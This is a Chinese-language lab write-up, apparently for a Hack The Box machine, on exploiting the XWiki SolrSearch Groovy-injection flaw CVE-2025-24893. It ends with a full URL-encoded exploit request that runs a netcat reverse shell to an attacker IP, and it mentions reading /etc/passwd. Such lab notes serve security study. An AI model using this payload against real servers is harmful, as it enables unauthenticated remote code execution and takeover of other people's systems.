2.Xwiki

1. 介绍

XWiki 是一个开源的企业级 Wiki 平台,不仅可以用来协作编辑文档,还可以作为企业内容管理系统(ECMS)、知识库、企业门户或定制应用开发平台
Pasted image 20250803174248.png

2. 利用

2.1. CVE-2025-24893 xwiki RCE

CVE-2025-24893 是 XWiki 中一个关键性的未经身份验证的远程代码执行(RCE)漏洞,XWiki 是一个流行的开源企业维基平台。该漏洞存在于 SolrSearch 宏在搜索查询中不正确处理 Groovy 表达式的方式中。这允许未经身份验证的攻击者在不进行任何身份验证或事先访问的情况下远程执行任意 Groovy 代码。
案例:【week12】Editor > 1.1.3. 2.Xwiki CVE-2025-24893 xwiki RCE

  • 受影响版本:所有版本均受影响,包括 15.10.11 之前的版本、16.4.1 和 16.5.0RC1
  • XWiki 包含一个名为 SolrSearch 的宏(定义在 Main.SolrSearchMacros 中),该宏通过嵌入式 Solr 引擎实现全文搜索。该漏洞源于该宏在 Groovy 中评估搜索参数的方式,未能对恶意输入进行清理或限制
  • 攻击者可以通过 GET 请求向搜索查询中注入 Groovy 表达式,并导致系统在 XWiki 服务器进程的上下文中评估任意代码。

POC:
Exploit/CVE-2025-24893.py at main · a1baradi/Exploit · GitHub
我们利用这个poc可以验证成功
Pasted image 20250803152952.png
你可以在浏览器中打开下面的连接

Pasted image 20250803153028.png
然后再点击这个
Pasted image 20250803153052.png
这不就是 /etc/passwd

下面我们只要在网页中修改payload即然后点击下面的RSS订阅即可触发
经过测试发现,必须要点击下面的连接才能触发RCE
Pasted image 20250803155945.png

http://wiki.editor.htb/xwiki/bin/view/Main/SolrSearch?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_type=DOCUMENT&f_locale=en&f_locale=&text=%7D%7D%7D%7B%7Basync+async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22busybox+nc+10.10.14.27+4455+-e+%2Fbin%2Fsh%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D

Pasted image 20250803160548.png